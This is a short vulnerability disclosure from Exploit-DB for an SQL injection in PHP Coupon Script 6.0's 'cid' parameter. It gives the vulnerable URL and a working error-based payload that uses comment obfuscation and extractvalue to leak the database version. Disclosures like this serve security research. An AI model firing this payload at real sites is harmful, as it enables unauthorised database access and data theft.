PHP Coupon Script 6.0 – ‘cid’ SQL Injection

  • 作者: Ihsan Sencan
    日期: 2017-08-21
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/42528/
  • # # # # #
    # Exploit Title: PHP Coupon Script 6.0 - 'cid' Parameter SQL Injection
    # Dork: N/A
    # Date: 21.08.2017
    # Vendor Homepage: http://www.couponscript.com/
    # Software Link: http://www.couponscript.com/
    # Demo: http://www.couponscript.com/demo/
    # Version: 6.0
    # Category: Webapps
    # Tested on: WiN7_x64/KaLiLinuX_x64
    # CVE: N/A
    # # # # #
    # Exploit Author: Ihsan Sencan
    # Author Web: http://ihsan.net
    # Author Social: @ihsansencan
    # # # # #
    # Description:
    # The vulnerability allows an attacker to inject sql commands....
    #
    # Proof of Concept:
    # 
    # http://localhost/[PATH]/index.php?page=cat&cid=[SQL]
    # 
    # 34'+/*!00000Procedure*/+/*!00000Analyse*/+(extractvalue(0,/*!00000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)--+-
    #
    # Etc...
    # # # # #